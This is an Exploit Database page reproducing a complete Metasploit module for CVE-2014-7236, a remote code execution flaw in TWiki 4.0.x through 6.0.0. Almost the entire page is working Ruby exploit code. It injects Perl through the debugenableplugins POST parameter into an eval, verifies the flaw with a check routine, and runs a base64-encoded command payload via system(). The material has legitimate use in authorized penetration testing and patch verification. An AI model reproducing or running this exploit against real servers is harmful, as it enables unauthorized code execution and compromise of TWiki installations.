TWiki Debugenableplugins – Remote Code Execution (Metasploit)

• Exploit Database
• 11 阅读

• 作者： Metasploit
  日期： 2015-03-19
• 类别：

  • remote
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36438/

• ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'TWiki Debugenableplugins Remote Code Execution',
  'Description' => %q{
  TWiki 4.0.x-6.0.0contains a vulnerability in the Debug functionality.
  The value of the debugenableplugins parameter is used without proper sanitization
  in an Perl eval statement which allows remote code execution
  },
  'Author' =>
  [
  'Netanel Rubin', # from Check Point - Discovery
  'h0ng10', # Metasploit Module
  
  ],
  'License' => MSF_LICENSE,
  'References' =>
  [
  [ 'CVE', '2014-7236'],
  [ 'OSVDB', '112977'],
  [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236']
  ],
  'Privileged' => false,
  'Targets' =>
  [
  [ 'Automatic',
  {
  'Payload'=>
  {
  'BadChars' => "",
  'Compat'=>
  {
  'PayloadType' => 'cmd',
  'RequiredCmd' => 'generic perl python php',
  }
  },
  'Platform' => ['unix'],
  'Arch' => ARCH_CMD
  }
  ]
  ],
  'DefaultTarget'=> 0,
  'DisclosureDate' => 'Oct 09 2014'))
  
  register_options(
  [
  OptString.new('TARGETURI', [ true, "TWiki path", '/do/view/Main/WebHome' ]),
  OptString.new('PLUGIN', [true, "A existing TWiki Plugin", 'BackupRestorePlugin'])
  ], self.class)
  end
  
  
  def send_code(perl_code)
  uri = target_uri.path
  data = "debugenableplugins=#{datastore['PLUGIN']}%3b" + CGI.escape(perl_code) + "%3bexit"
  
  res = send_request_cgi!({
  'method' => 'POST',
  'uri' => uri,
  'data' => data
  })
  
  return res
  end
  
  
  def check
  rand_1 = rand_text_alpha(5)
  rand_2 = rand_text_alpha(5)
  
  code = "print(\"Content-Type:text/html\\r\\n\\r\\n#{rand_1}\".\"#{rand_2}\")"
  res = send_code(code)
  
  if res and res.code == 200
  return CheckCode::Vulnerable if res.body == rand_1 + rand_2
  end
  CheckCode::Unknown
  end
  
  
  def exploit
  code = "print(\"Content-Type:text/html\\r\\n\\r\\n\");"
  code += "require('MIME/Base64.pm');MIME::Base64->import();"
  code += "system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit"
  res = send_code(code)
  handler
  
  end
  
  end